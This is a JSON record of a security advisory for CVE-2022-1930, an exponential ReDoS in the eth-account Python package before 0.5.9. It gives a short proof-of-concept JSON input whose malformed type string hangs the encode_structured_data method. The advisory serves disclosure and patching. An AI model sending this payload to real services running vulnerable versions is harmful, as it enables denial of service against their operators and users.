{"hash":"7d33105a6d61bdfc6cc4681526e938d3ccdb08c6","data":{"post":{"title":"eth-account ReDoS","path":"/vulnerabilities/eth-account-redos-xray-248681/","content":"<h2 id=\"summary\"><a href=\"#summary\" aria-hidden=\"true\" tabindex=\"-1\">Summary</a></h2>\n<p>Exponential ReDoS in eth-account leads to denial of service</p>\n<h2 id=\"component\"><a href=\"#component\" aria-hidden=\"true\" tabindex=\"-1\">Component</a></h2>\n<p><a href=\"https://pypi.org/project/eth-account/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">eth-account</a></p>\n<h2 id=\"affected-versions\"><a href=\"#affected-versions\" aria-hidden=\"true\" tabindex=\"-1\">Affected versions</a></h2>\n<p>eth-account (,0.5.9), fixed in 0.5.9</p>\n<h2 id=\"description\"><a href=\"#description\" aria-hidden=\"true\" tabindex=\"-1\">Description</a></h2>\n<p>An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the eth-account PyPI package, when an attacker is able to supply arbitrary input to the <code>encode_structured_data</code> method</p>\n<h2 id=\"poc\"><a href=\"#poc\" aria-hidden=\"true\" tabindex=\"-1\">PoC</a></h2>\n<pre><code>{\n        \"types\": {\n                \"EIP712Domain\": [\n                        {\"name\": \"aaaa\", \"type\": \"$[11111111111111111111111110\"},\n                        {\"name\": \"version\", \"type\": \"string\"},\n                        {\"name\": \"chainId\", \"type\": \"uint256\"},\n                        {\"name\": \"verifyingContract\", \"type\": \"address\"}\n                 ]\n        }\n}\n</code></pre>\n<h2 id=\"vulnerability-mitigations\"><a href=\"#vulnerability-mitigations\" aria-hidden=\"true\" tabindex=\"-1\">Vulnerability Mitigations</a></h2>\n<p>No mitigations are supplied for this issue</p>\n<h2 id=\"references\"><a href=\"#references\" aria-hidden=\"true\" tabindex=\"-1\">References</a></h2>\n<p><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2022-1930\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">NVD</a></p>\n","description":"CVE-2022-1930 Medium severity. Exponential ReDoS in eth-account leads to denial of service","date_published":"2022-08-11","xray_id":"XRAY-248681","vul_id":"CVE-2022-1930","severity":"medium","discovered_by":"Denys Vozniuk","last_updated":"2022-08-11","cvss":5.9}},"context":{}}